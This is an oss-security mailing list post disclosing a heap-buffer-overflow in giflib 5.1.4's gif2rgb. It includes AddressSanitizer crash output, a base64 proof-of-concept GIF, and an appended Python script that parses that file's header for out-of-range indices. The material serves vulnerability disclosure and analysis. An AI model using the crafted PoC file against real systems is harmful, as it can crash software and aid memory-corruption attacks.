Date: Tue, 13 Sep 2016 18:50:06 +0200
From: Solar Designer <solar@...nwall.com>
To: "vul @ 724safe" <vul@...safe.com>
Cc: oss-security@...ts.openwall.com
Subject: Re: Heapoverflow in giflib5.1.4

On Tue, Sep 13, 2016 at 11:20:08PM +0800, vul @ 724safe wrote:
> With Address Sanitizer there is a heap overflow in giflib 5.1.4
> More details are available at:
> https://sourceforge.net/p/giflib/bugs/102/

When posting to oss-security, please include the actual detail right in
your posting (up to 200 KB including MIME overhead, but of course try to
keep it smaller than that if at all practical) - not only via external
links.  I've attached the content of the above link now.  Luckily, this
one PoC GIF file is tiny:

$ base64 poc
R0lGODdhKP9/AADZACwAHQAAKAAAAPngp5Lb5QAD4wAAAgAAOwAd

Ideally, you would also investigate and patch issues found by ASan,
rather than merely include its output, but I realize we can't actually
expect anything specific from volunteers.  So whatever we've got.

Thanks,

Alexander

#102 Heap overflow in gif2rgb.c

   Milestone: v1.0_(example)
   Status: open
   Owner: nobody
   Labels: heap overflow (1)
   Priority: 7
   Updated: 2 hours ago
   Created: 2 hours ago
   Creator: STARLAB
   Private: No

   Hello,
   There is a heap overflow in giflib 5.1.4. The crash output with ASan is as follows:
   ./util/gif2rgb poc
   =================================================================
   ==8885==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xf6200a3b at pc 0x80d317d bp 0xffce7d58 sp 0xffce7d50
   READ of size 1 at 0xf6200a3b thread T0
   #0 0x80d317c in DumpScreen2RGB /home/starlab/test-fuzzing/giflib-5.1.4/util/gif2rgb.c:294
   #1 0x80d1736 in GIF2RGB /home/starlab/test-fuzzing/giflib-5.1.4/util/gif2rgb.c:474
   #2 0x80cb9e2 in main /home/starlab/test-fuzzing/giflib-5.1.4/util/gif2rgb.c:525
   #3 0xf74b4af2 (/lib/i386-linux-gnu/libc.so.6+0x19af2)
   #4 0x80ca7f4 in _start (/home/starlab/test-fuzzing/giflib-5.1.4/util/.libs/lt-gif2rgb+0x80ca7f4)

   AddressSanitizer can not describe address in more detail (wild memory access suspected).
   SUMMARY: AddressSanitizer: heap-buffer-overflow /home/starlab/test-fuzzing/giflib-5.1.4/util/gif2rgb.c:294 DumpScreen2RGB
   ==8885==ABORTING

   The PoC is in the attachment.
   The vulnerability was found by F4B3CD@...RLAB.

[ CONTENT OF TYPE application/octet-stream SKIPPED ]
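As an added example (not part of this thread and not giflib code), the following Python script decodes the PoC quoted above and parses the GIF header, logical screen descriptor and first image descriptor, reporting the structural conditions a decoder should check before it uses a pixel or background index to address a color table. It does not claim to be the root cause analysis the report omits; it only shows what the 39 bytes declare.

```python
import base64
import struct

# The PoC exactly as quoted in the message above (39 bytes once decoded).
POC_B64 = "R0lGODdhKP9/AADZACwAHQAAKAAAAPngp5Lb5QAD4wAAAgAAOwAd"


def parse_gif_headers(data):
    """Parse the header, logical screen descriptor and first image
    descriptor of a GIF; return the fields and a list of structural
    warnings a decoder should act on before indexing a color table."""
    if len(data) < 13 or data[:6] not in (b"GIF87a", b"GIF89a"):
        raise ValueError("not a GIF header")
    sw, sh, packed, bg, _aspect = struct.unpack("<HHBBB", data[6:13])
    gct_size = 2 ** ((packed & 0x07) + 1) if packed & 0x80 else 0
    info = {"version": data[3:6].decode(), "screen": (sw, sh),
            "gct_size": gct_size, "bg_index": bg, "warnings": []}
    pos = 13 + 3 * gct_size
    # Skip extension blocks (0x21, label, length-prefixed sub-blocks, 0x00).
    while pos < len(data) and data[pos] == 0x21:
        pos += 2
        while pos < len(data) and data[pos] != 0:
            pos += data[pos] + 1
        pos += 1
    if pos + 10 <= len(data) and data[pos] == 0x2C:  # image separator
        left, top, iw, ih, ipacked = struct.unpack("<HHHHB", data[pos + 1:pos + 10])
        lct_size = 2 ** ((ipacked & 0x07) + 1) if ipacked & 0x80 else 0
        info["image"] = {"left": left, "top": top, "size": (iw, ih),
                         "interlaced": bool(ipacked & 0x40), "lct_size": lct_size}
        if iw == 0 or ih == 0:
            info["warnings"].append("image has zero width or height")
        if left + iw > sw or top + ih > sh:
            info["warnings"].append("image extends past the logical screen")
        # A renderer that pre-fills the screen with the background index and
        # then looks that index up must make sure it fits the table it uses.
        table = gct_size or lct_size
        if bg >= table:
            info["warnings"].append("background index %d out of range for a "
                                    "%d-entry color table" % (bg, table))
    return info


def parse_poc():
    """Decode and parse the PoC from the message."""
    return parse_gif_headers(base64.b64decode(POC_B64))


if __name__ == "__main__":
    for key, value in parse_poc().items():
        print(key, value)
```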
